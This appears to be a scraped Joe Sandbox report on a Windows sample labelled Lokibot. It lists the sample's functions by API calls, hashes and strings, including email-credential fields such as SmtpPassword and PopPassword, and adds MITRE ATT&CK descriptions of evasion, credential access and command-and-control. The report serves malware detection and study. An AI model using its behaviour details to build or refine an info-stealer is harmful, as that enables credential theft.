String ID:
API String ID:
Opcode ID: c5ab4101548f4886a81473add053dffb0234c11192abe75b72d84a48c2378c6a
Instruction ID: fe0c066ec508038f58fd3ba7a63ea909283444412be833d77d7bc85fc5454c86
Opcode Fuzzy Hash: c5ab4101548f4886a81473add053dffb0234c11192abe75b72d84a48c2378c6a
Instruction Fuzzy Hash: EF012B3100C3509FE7208E61CC84BE7FB98DF41324F18C51BED081E282EB799840CAB1

Function 00EBD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475400243.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ebd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2461645d72d3e6db771543324628f1980001bfcdc8d50c3678a0d2ac510754b
Instruction ID: 494d05ff8ea4cdcea2a41fbc6c29a6536bdc88392921c9fcc20e941136974605
Opcode Fuzzy Hash: c2461645d72d3e6db771543324628f1980001bfcdc8d50c3678a0d2ac510754b
Instruction Fuzzy Hash: C3F06D71408354AFE7108E16DC88BE7FFA8EB91738F18C45AED485E286D7799C44CAB1

Analysis Process: Xzacmv.exePID: 4900, Parent PID: 8160COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpAccount, xrefs: 0040D0FA
PopServer, xrefs: 0040D099
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB
PopAccount, xrefs: 0040D0B6
SmtpPassword, xrefs: 0040D117
EmailAddress, xrefs: 0040D074
PopPort, xrefs: 0040D0A7
SmtpServer, xrefs: 0040D0DC

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Xzacmv.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report oAUBqI6vQ7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xzacmv.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oAUBqI6vQ7.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uak53xd.kry.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bliiyspd.e3m.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzhiysip.lt2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyhrxntg.fcz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpdcvl1v.gan.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxfbiqfc.eia.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4qcxujn.vca.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhcy3z0m.otz.psm1

C:\Users\user\AppData\Local\Temp\tmp9E72.tmp

Windows Analysis Report
oAUBqI6vQ7.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre